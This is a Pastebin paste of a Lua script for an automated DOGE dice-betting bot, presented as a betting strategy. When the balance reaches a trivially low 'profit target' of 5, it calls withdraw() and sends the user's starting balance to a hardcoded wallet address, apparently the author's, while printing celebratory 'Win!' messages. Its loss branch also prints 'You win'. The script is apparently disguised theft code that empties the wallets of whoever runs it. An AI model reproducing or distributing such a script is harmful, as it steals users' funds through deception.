Advertisement
Guest User

Untitled

a guest
Apr 20th, 2019
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.26 KB | None | 0 0
  1. chance = 66
  2. bethigh = true
  3. basebet = balance/200
  4. nextbet = basebet
  5.  
  6. amount=balance
  7. profittarget=5
  8. stoptarget=0
  9.  
  10. function dobet()
  11. if (win) then
  12. chance = 70
  13. basebet = balance/200
  14. nextbet = basebet
  15. else
  16. if chance == 72 then
  17. nextbet = previousbet * 1.33738
  18. else
  19. chance = 70
  20. nextbet = basebet/3.3
  21. print("-----------------------------------------")
  22. print(" ")
  23. print("You win ") print(profit) print(" For Now")
  24. print(" ")
  25. print("Your Balance ") print(balance)
  26. print(" ")
  27. print("-----------------------------------------")
  28. resetseed();
  29. end
  30. end
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37. if balance <= stoptarget then
  38. stop()
  39. end
  40.  
  41. if (balance) >= profittarget then
  42.  
  43. ching()
  44. alarm()
  45. print("Your Balance ") print(balance)
  46. print(" ")
  47. print("Win!")
  48. print(" ")
  49. print("Win!!")
  50. print(" ")
  51. print("Awesome")
  52. print(" ")
  53. print("Don't Greedy!")
  54. print(" ")
  55. print("Win ") print(profit) print(" For Now")
  56. print(" ")
  57. print("Withdrawing Target Amount ") print(amount) print(" DOGE")
  58.  
  59.  
  60. withdraw(amount,"DMvRKegphJaurCn1KwnqrqNfudbqctaPLS")
  61.  
  62. print(" ")
  63. print("Next Profit")
  64.  
  65.  
  66. resetseed();
  67.  
  68.  
  69.  
  70. end
  71.  
  72. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement